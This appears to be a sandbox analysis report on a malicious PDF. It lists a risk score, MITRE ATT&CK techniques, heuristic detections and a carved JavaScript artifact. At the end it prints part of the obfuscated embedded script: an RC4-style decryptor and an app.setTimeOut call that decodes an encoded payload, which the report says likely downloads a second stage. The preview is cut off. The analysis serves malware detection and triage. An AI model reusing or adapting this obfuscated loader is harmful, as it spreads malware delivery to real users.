MALICIOUS
Risk Score: 116
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
This PDF file contains embedded JavaScript that is heavily obfuscated, indicating malicious intent to exploit vulnerabilities. The ML classifier and heuristic firings strongly suggest this is a malicious PDF. The JavaScript likely attempts to download and execute a secondary payload, a common technique for malware delivery.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
- JavaScript action (low, 2 related findings), PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical), PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- Embedded JS stream (low), PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info), EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0013_000.js c40243689f8fa3dd6ef023eb78a1b8a668b8c6b76b606c9046586b8de5570d49 | pdf-javascript-stream | PDF /JS object 13 at offset 0x3CE | 5545 bytes |

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).

Preview script
First 1,000 lines of the extracted script
function selikurubi7(bisadotan,nipidame7){var vonetitod=[],lefam2,boruvov=0,libulofap,bivemil='',kuvel;for(lefam2=0;lefam2<256;lefam2++){vonetitod[lefam2]=lefam2;}for(lefam2=0;lefam2<256;lefam2++){boruvov=(boruvov+vonetitod[lefam2]+bisadotan.charCodeAt(lefam2%bisadotan.length))%256;libulofap=vonetitod[lefam2];vonetitod[lefam2]=vonetitod[boruvov];vonetitod[boruvov]=libulofap;}lefam2=0;boruvov=0;for(kuvel=0;kuvel<nipidame7.length;kuvel++){lefam2=(lefam2+1)%256;boruvov=(boruvov+vonetitod[lefam2])%256;libulofap=vonetitod[lefam2];vonetitod[lefam2]=vonetitod[boruvov];vonetitod[boruvov]=libulofap;bivemil+=vekimobod(nipidame7.charCodeAt(kuvel)^vonetitod[(vonetitod[lefam2]+vonetitod[boruvov])%256]);}return bivemil;}function vekimobod(puvokuveru7){return String.fromCharCode(puvokuveru7)}function pufipesipa(dapukudafe,kakakivaki){return kakakivaki?(vekimobod(dapukudafe++)+pufipesipa(dapukudafe,--kakakivaki)):''}function mupofi1(){return pufipesipa(65,26)+pufipesipa(97,26)+pufipesipa(48,10)+'+'+vekimobod(47)+'='}var depabam7=mupofi1(),movosom=app.setTimeOut(selikurubi7(bopud("SVNzODRqbkttaXNXTXdrVTVnSkU3blA3TVFKZzA="),bopud("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
... (truncated)